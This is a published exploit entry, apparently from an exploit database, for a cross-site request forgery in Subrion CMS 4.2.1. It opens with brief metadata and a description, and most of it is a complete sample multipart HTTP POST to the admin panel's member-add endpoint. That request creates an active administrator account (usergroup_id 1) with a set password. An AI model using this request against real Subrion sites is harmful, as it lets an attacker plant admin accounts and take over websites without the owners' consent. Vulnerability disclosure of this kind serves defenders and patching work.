# Exploit Title: Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)
# Date: 2022-02-09
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://subrion.org
# Software Link: https://subrion.org/download
# Version: 4.2.1
# Tested on: Windows 10
# [ About - Subrion CMS ]:
#Subrion is a PHP/MySQL based CMS & framework,
#that allows you to build websites for any purpose,
#Yes, from blog to corporate mega portal.
# [ Description ]:
# CSRF vulnerability was discovered in 4.2.1 version of Subrion CMS,
# With this vulnerability, authorized users can be added to the system.
# [ Sample CSRF Request ]:
POST /subrion/panel/members/add/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------386122140640094420852486902
Content-Length: 2522
Origin: http://localhost
Connection: close
Referer: http://localhost/subrion/panel/members/add/
Cookie: loader=loaded; INTELLI_ffd8ae8438=ftph4lgam8hugh8j0mgv8j4q2l
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="__st"
YNXrr7MjSY0Qi0JYISJ7DRuC9Gd1zxPYwjHcFKVh
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="username"
Aryan
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="fullname"
AryanChehreghani
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="email"
aryanchehreghani@yahoo.com
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="_password"
Test1234!
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="_password2"
Test1234!
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="usergroup_id"
1
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="website"
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="phone"
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="biography"
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="facebook"
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="twitter"
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="gplus"
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="linkedin"
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="email_language"
en
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="sponsored"
0
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="featured"
0
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="featured_end"
2022-03-09 12:03
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="status"
active
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="save"
1
-----------------------------386122140640094420852486902
Content-Disposition: form-data; name="goto"
list
-----------------------------386122140640094420852486902--